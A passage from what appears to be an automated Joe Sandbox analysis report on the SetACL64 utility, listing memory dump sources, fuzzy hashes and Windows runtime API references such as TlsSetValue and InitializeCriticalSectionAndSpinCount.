                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AllocErrorLast
                              • String ID: tss
                              • API String ID: 4252645092-1638339373
                              • Opcode ID: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                              • Instruction ID: 3682be5ea63bb464cd65783881d02fa6c80742393b09cdef4187c53f5331fe61
                              • Opcode Fuzzy Hash: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                              • Instruction Fuzzy Hash: 4001A2A5E09A4782E630AB34A88507962B0FFA8394F900271D65DC27E4EE7CE5458600
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AllocErrorLast
                              • String ID: tss
                              • API String ID: 4252645092-1638339373
                              • Opcode ID: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
                              • Instruction ID: a4e490359672da74ea046f0bf74ce4b888cd145bbdd049df7db10a6663342680
                              • Opcode Fuzzy Hash: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
                              • Instruction Fuzzy Hash: D2F0F9F5A09A4282E7309B24A89507963B1FF687E4FA405B1D69EC2AE5EF3CE544D600
                              APIs
                              • try_get_function.LIBVCRUNTIME ref: 00007FF697087FC9
                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF6970917EE,?,?,?,00007FF6970916E6,?,?,?,00007FF6970937A6), ref: 00007FF697087FE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                              • String ID: InitializeCriticalSectionEx
                              • API String ID: 539475747-3084827643
                              • Opcode ID: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
                              • Instruction ID: 9953a68bcba4b172d311e39ce0c01de33456a870dda4c3544b7a6772018889af
                              • Opcode Fuzzy Hash: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
                              • Instruction Fuzzy Hash: 6DF089A5F0874191F7248B92F4444A96321EF88BD0F4450B5D94DC7B59CF3DE445C740
                              APIs
                              • try_get_function.LIBVCRUNTIME ref: 00007FF697087E85
                              • TlsSetValue.KERNEL32(?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000), ref: 00007FF697087E9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Valuetry_get_function
                              • String ID: FlsSetValue
                              • API String ID: 738293619-3750699315
                              • Opcode ID: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
                              • Instruction ID: 366f26a6d6813fc7ca50ccfc22a367cd83c87f5b6a47526237a99d9c159fff99
                              • Opcode Fuzzy Hash: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
                              • Instruction Fuzzy Hash: A0E065E1A0864291EA289B91F4545F96262EF887D0F985076D94DC6364CE3DE884C300